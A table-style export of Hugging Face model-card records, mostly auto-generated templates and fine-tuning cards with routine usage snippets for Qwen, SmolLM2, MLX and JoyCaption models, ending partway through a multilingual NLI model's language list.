This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
ChenWu98/numina_qwen_2.5_7b_sft_teachers_no_reasoning_source_split_0_2048_0.25
|
ChenWu98
| 2025-09-23T17:06:45Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:Qwen/Qwen2.5-7B",
"base_model:finetune:Qwen/Qwen2.5-7B",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:39:00Z |
---
base_model: Qwen/Qwen2.5-7B
library_name: transformers
model_name: numina_qwen_2.5_7b_sft_teachers_no_reasoning_source_split_0_2048_0.25
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for numina_qwen_2.5_7b_sft_teachers_no_reasoning_source_split_0_2048_0.25
This model is a fine-tuned version of [Qwen/Qwen2.5-7B](https://huggingface.co/Qwen/Qwen2.5-7B).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/chenwu/huggingface/runs/dz0bo6z6)
This model was trained with SFT.
### Framework versions
- TRL: 0.19.1
- Transformers: 4.51.1
- Pytorch: 2.7.0
- Datasets: 4.0.0
- Tokenizers: 0.21.4
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
qurk41/KAT-Dev-mlx-4Bit
|
qurk41
| 2025-09-23T17:05:56Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"mlx",
"conversational",
"multilingual",
"base_model:Kwaipilot/KAT-Dev",
"base_model:quantized:Kwaipilot/KAT-Dev",
"license:other",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"region:us"
] |
text-generation
| 2025-09-23T17:04:29Z |
---
language:
- multilingual
license: other
license_name: kwaipilot-license
license_link: LICENSE
library_name: transformers
tags:
- mlx
base_model: Kwaipilot/KAT-Dev
---
# qurk41/KAT-Dev-mlx-4Bit
The Model [qurk41/KAT-Dev-mlx-4Bit](https://huggingface.co/qurk41/KAT-Dev-mlx-4Bit) was converted to MLX format from [Kwaipilot/KAT-Dev](https://huggingface.co/Kwaipilot/KAT-Dev) using mlx-lm version **0.26.4**.
## Use with mlx
```bash
pip install mlx-lm
```
```python
from mlx_lm import load, generate
model, tokenizer = load("qurk41/KAT-Dev-mlx-4Bit")
prompt="hello"
if hasattr(tokenizer, "apply_chat_template") and tokenizer.chat_template is not None:
messages = [{"role": "user", "content": prompt}]
prompt = tokenizer.apply_chat_template(
messages, tokenize=False, add_generation_prompt=True
)
response = generate(model, tokenizer, prompt=prompt, verbose=True)
```
|
shrikantnaidu/SmolLM2-FT-MyDataset
|
shrikantnaidu
| 2025-09-23T17:05:37Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"llama",
"text-generation",
"generated_from_trainer",
"sft",
"trl",
"smol-course",
"module_1",
"conversational",
"base_model:HuggingFaceTB/SmolLM2-135M",
"base_model:finetune:HuggingFaceTB/SmolLM2-135M",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T17:05:03Z |
---
base_model: HuggingFaceTB/SmolLM2-135M
library_name: transformers
model_name: SmolLM2-FT-MyDataset
tags:
- generated_from_trainer
- sft
- trl
- smol-course
- module_1
licence: license
---
# Model Card for SmolLM2-FT-MyDataset
This model is a fine-tuned version of [HuggingFaceTB/SmolLM2-135M](https://huggingface.co/HuggingFaceTB/SmolLM2-135M).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="shrikantnaidu/SmolLM2-FT-MyDataset", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/skn97/huggingface/runs/6lmdvmlb)
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.1
- Pytorch: 2.8.0+cu126
- Datasets: 4.0.0
- Tokenizers: 0.22.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
lhkhiem28/MolT-Rex-DrugADMET-Lipophilicity-llasmol-llama-2-7b-sft
|
lhkhiem28
| 2025-09-23T17:05:03Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"hf_jobs",
"trl",
"sft",
"base_model:lhkhiem28/MolT-Rex-SMolInstruct-llama-2-7b-merged",
"base_model:finetune:lhkhiem28/MolT-Rex-SMolInstruct-llama-2-7b-merged",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:55:59Z |
---
base_model: lhkhiem28/MolT-Rex-SMolInstruct-llama-2-7b-merged
library_name: transformers
model_name: MolT-Rex-DrugADMET-Lipophilicity-llasmol-llama-2-7b-sft
tags:
- generated_from_trainer
- hf_jobs
- trl
- sft
licence: license
---
# Model Card for MolT-Rex-DrugADMET-Lipophilicity-llasmol-llama-2-7b-sft
This model is a fine-tuned version of [lhkhiem28/MolT-Rex-SMolInstruct-llama-2-7b-merged](https://huggingface.co/lhkhiem28/MolT-Rex-SMolInstruct-llama-2-7b-merged).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="lhkhiem28/MolT-Rex-DrugADMET-Lipophilicity-llasmol-llama-2-7b-sft", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/kle3/MolT-Rex/runs/rbyoe0wp)
This model was trained with SFT.
### Framework versions
- TRL: 0.22.2
- Transformers: 4.55.4
- Pytorch: 2.8.0
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
AzzamAhmed/whisper-arabic-egyptian-peft-84
|
AzzamAhmed
| 2025-09-23T17:00:49Z | 0 | 1 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:54:48Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
1038lab/llama-joycaption-alpha-two
|
1038lab
| 2025-09-23T17:00:22Z | 0 | 0 | null |
[
"safetensors",
"llava",
"captioning",
"base_model:google/siglip-so400m-patch14-384",
"base_model:finetune:google/siglip-so400m-patch14-384",
"region:us"
] | null | 2025-09-23T16:49:11Z |
---
base_model:
- meta-llama/Llama-3.1-8B-Instruct
- google/siglip-so400m-patch14-384
tags:
- captioning
---
# Model Card for Llama JoyCaption Alpha Two
[Github](https://github.com/fpgaminer/joycaption)
JoyCaption is an image captioning Visual Language Model (VLM) being built from the ground up as a free, open, and uncensored model for the community to use in training Diffusion models.
Key Features:
- **Free and Open**: It will be released for free, open weights, no restrictions, and just like [bigASP](https://www.reddit.com/r/StableDiffusion/comments/1dbasvx/the_gory_details_of_finetuning_sdxl_for_30m/), will come with training scripts and lots of juicy details on how it gets built.
- **Uncensored**: Equal coverage of SFW and NSFW concepts. No "cylindrical shaped object with a white substance coming out on it" here.
- **Diversity**: All are welcome here. Do you like digital art? Photoreal? Anime? Furry? JoyCaption is for everyone. Pains are being taken to ensure broad coverage of image styles, content, ethnicity, gender, orientation, etc.
- **Minimal Filtering**: JoyCaption is trained on large swathes of images so that it can understand almost all aspects of our world. almost. Illegal content will never be tolerated in JoyCaption's training.
## Motivation
Automated descriptive captions enable the training and finetuning of diffusion models on a wider range of images, since trainers are no longer required to either find images with already associated text or write the descriptions themselves. They also improve the quality of generations produced by Text-to-Image models trained on them (ref: DALL-E 3 paper). But to-date, the community has been stuck with ChatGPT, which is expensive and heavily censored; or alternative models, like CogVLM, which are weaker than ChatGPT and have abysmal performance outside of the SFW domain.
I'm building JoyCaption to help fill this gap by performing near or on-par with GPT4o in captioning images, while being free, unrestricted, and open.
## How to Get Started with the Model
Please see the [Github](https://github.com/fpgaminer/joycaption) for more details.
Example usage:
```
import torch
from PIL import Image
from transformers import AutoProcessor, LlavaForConditionalGeneration
IMAGE_PATH = "image.jpg"
PROMPT = "Write a long descriptive caption for this image in a formal tone."
MODEL_NAME = "fancyfeast/llama-joycaption-alpha-two-hf-llava"
# Load JoyCaption
# bfloat16 is the native dtype of the LLM used in JoyCaption (Llama 3.1)
# device_map=0 loads the model into the first GPU
processor = AutoProcessor.from_pretrained(MODEL_NAME)
llava_model = LlavaForConditionalGeneration.from_pretrained(MODEL_NAME, torch_dtype="bfloat16", device_map=0)
llava_model.eval()
with torch.no_grad():
# Load image
image = Image.open(IMAGE_PATH)
# Build the conversation
convo = [
{
"role": "system",
"content": "You are a helpful image captioner.",
},
{
"role": "user",
"content": PROMPT,
},
]
# Format the conversation
# WARNING: HF's handling of chat's on Llava models is very fragile. This specific combination of processor.apply_chat_template(), and processor() works
# but if using other combinations always inspect the final input_ids to ensure they are correct. Often times you will end up with multiple <bos> tokens
# if not careful, which can make the model perform poorly.
convo_string = processor.apply_chat_template(convo, tokenize = False, add_generation_prompt = True)
assert isinstance(convo_string, str)
# Process the inputs
inputs = processor(text=[convo_string], images=[image], return_tensors="pt").to('cuda')
inputs['pixel_values'] = inputs['pixel_values'].to(torch.bfloat16)
# Generate the captions
generate_ids = llava_model.generate(
**inputs,
max_new_tokens=300,
do_sample=True,
suppress_tokens=None,
use_cache=True,
temperature=0.6,
top_k=None,
top_p=0.9,
)[0]
# Trim off the prompt
generate_ids = generate_ids[inputs['input_ids'].shape[1]:]
# Decode the caption
caption = processor.tokenizer.decode(generate_ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)
caption = caption.strip()
print(caption)
```
## vLLM
vLLM provides the highest performance inference for JoyCaption, and an OpenAI compatible API so JoyCaption can be used like any other VLMs. Example usage:
```
vllm serve fancyfeast/llama-joycaption-alpha-two-hf-llava --max-model-len 4096 --enable-prefix-caching
```
VLMs are a bit finicky on vLLM, and vLLM is memory hungry, so you may have to adjust settings for your particular environment, such as forcing eager mode, adjusting max-model-len, adjusting gpu_memory_utilization, etc.
|
AchyutaGH/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slender_grazing_ladybug
|
AchyutaGH
| 2025-09-23T16:59:51Z | 11 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"rl-swarm",
"grpo",
"gensyn",
"I am slender grazing ladybug",
"trl",
"genrl-swarm",
"I am slender_grazing_ladybug",
"conversational",
"arxiv:2402.03300",
"base_model:unsloth/Qwen2.5-0.5B-Instruct",
"base_model:finetune:unsloth/Qwen2.5-0.5B-Instruct",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-05-18T23:00:30Z |
---
base_model: unsloth/Qwen2.5-0.5B-Instruct
library_name: transformers
model_name: Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slender_grazing_ladybug
tags:
- generated_from_trainer
- rl-swarm
- grpo
- gensyn
- I am slender grazing ladybug
- trl
- genrl-swarm
- I am slender_grazing_ladybug
licence: license
---
# Model Card for Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slender_grazing_ladybug
This model is a fine-tuned version of [unsloth/Qwen2.5-0.5B-Instruct](https://huggingface.co/unsloth/Qwen2.5-0.5B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="AchyutaGH/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slender_grazing_ladybug", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.18.1
- Transformers: 4.52.4
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
Bossologist/Qwen3-4B-Instruct-2507_general_ft_lora
|
Bossologist
| 2025-09-23T16:58:46Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"unsloth",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:58:38Z |
---
library_name: transformers
tags:
- unsloth
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
derekcurtis1/SD35_minecraft_cobble
|
derekcurtis1
| 2025-09-23T16:56:03Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T16:42:19Z |
---
license: apache-2.0
---
|
oist/multimodal_nli_model
|
oist
| 2025-09-23T16:53:39Z | 0 | 0 | null |
[
"safetensors",
"mmnli",
"sentence-similarity",
"custom_code",
"ace",
"acm",
"acq",
"aeb",
"af",
"ajp",
"ak",
"am",
"apc",
"ar",
"ars",
"ary",
"arz",
"as",
"ast",
"awa",
"ay",
"azb",
"azj",
"ba",
"bm",
"ban",
"be",
"bem",
"bn",
"bho",
"bjn",
"bo",
"bs",
"bug",
"bg",
"ca",
"ceb",
"cs",
"cjk",
"ckb",
"crh",
"cy",
"da",
"de",
"dik",
"dyu",
"dz",
"el",
"en",
"eo",
"et",
"eu",
"ee",
"fo",
"fa",
"fj",
"fi",
"fon",
"fr",
"fur",
"ff",
"gd",
"ga",
"gl",
"gn",
"gu",
"ht",
"ha",
"he",
"hi",
"hne",
"hr",
"hu",
"hy",
"ig",
"ilo",
"id",
"is",
"it",
"jv",
"ja",
"kab",
"kac",
"kam",
"kn",
"ks",
"ka",
"kr",
"kk",
"kbp",
"kea",
"km",
"ki",
"rw",
"ky",
"kmb",
"kg",
"ko",
"kmr",
"lo",
"lv",
"lij",
"li",
"ln",
"lt",
"lmo",
"ltg",
"lb",
"lua",
"lg",
"luo",
"lus",
"mag",
"mai",
"ml",
"mr",
"min",
"mk",
"plt",
"mt",
"mni",
"mn",
"mos",
"mi",
"ms",
"my",
"nl",
"nn",
"nb",
"ne",
"nso",
"nus",
"ny",
"oc",
"gaz",
"ory",
"pag",
"pa",
"pap",
"pl",
"pt",
"prs",
"pbt",
"qu",
"ro",
"rn",
"ru",
"sg",
"sa",
"sat",
"scn",
"shn",
"si",
"sk",
"sl",
"sm",
"sn",
"sd",
"so",
"st",
"es",
"als",
"sc",
"sr",
"ss",
"su",
"sv",
"sw",
"szl",
"ta",
"tt",
"te",
"tg",
"tl",
"th",
"ti",
"taq",
"tpi",
"tn",
"ts",
"tk",
"tum",
"tr",
"tw",
"tzm",
"ug",
"uk",
"umb",
"ur",
"uz",
"vec",
"vi",
"war",
"wo",
"xh",
"yi",
"yo",
"yue",
"zh",
"zu",
"license:cc-by-nc-4.0",
"region:us"
] |
sentence-similarity
| 2025-09-23T15:17:30Z |
---
license: cc-by-nc-4.0
language:
- ace
- acm
- acq
- aeb
- af
- ajp
- ak
- am
- apc
- ar
- ars
- ary
- arz
- as
- ast
- awa
- ay
- azb
- azj
- ba
- bm
- ban
- be
- bem
- bn
- bho
- bjn
- bo
- bs
- bug
- bg
- ca
- ceb
- cs
- cjk
- ckb
- crh
- cy
- da
- de
- dik
- dyu
- dz
- el
- en
- eo
- et
- eu
- ee
- fo
- fa
- fj
- fi
- fon
- fr
- fur
- ff
- gd
- ga
- gl
- gn
- gu
- ht
- ha
- he
- hi
- hne
- hr
- hu
- hy
- ig
- ilo
- id
- is
- it
- jv
- ja
- kab
- kac
- kam
- kn
- ks
- ka
- kr
- kk
- kbp
- kea
- km
- ki
- rw
- ky
- kmb
- kg
- ko
- kmr
- lo
- lv
- lij
- li
- ln
- lt
- lmo
- ltg
- lb
- lua
- lg
- luo
- lus
- mag
- mai
- ml
- mr
- min
- mk
- plt
- mt
- mni
- mn
- mos
- mi
- ms
- my
- nl
- nn
- nb
- ne
- nso
- nus
- ny
- oc
- gaz
- ory
- pag
- pa
- pap
- pl
- pt
- prs
- pbt
- qu
- ro
- rn
- ru
- sg
- sa
- sat
- scn
- shn
- si
- sk
- sl
- sm
- sn
- sd
- so
- st
- es
- als
- sc
- sr
- ss
- su
- sv
- sw
- szl
- ta
- tt
- te
- tg
- tl
- th
- ti
- taq
- tpi
- tn
- ts
- tk
- tum
- tr
- tw
- tzm
- ug
- uk
- umb
- ur
- uz
- vec
- vi
- war
- wo
- xh
- yi
- yo
- yue
- zh
- zu
language_details: >-
ace_Arab, ace_Latn, acm_Arab, acq_Arab, aeb_Arab, afr_Latn, ajp_Arab,
aka_Latn, amh_Ethi, apc_Arab, arb_Arab, ars_Arab, ary_Arab, arz_Arab,
asm_Beng, ast_Latn, awa_Deva, ayr_Latn, azb_Arab, azj_Latn, bak_Cyrl,
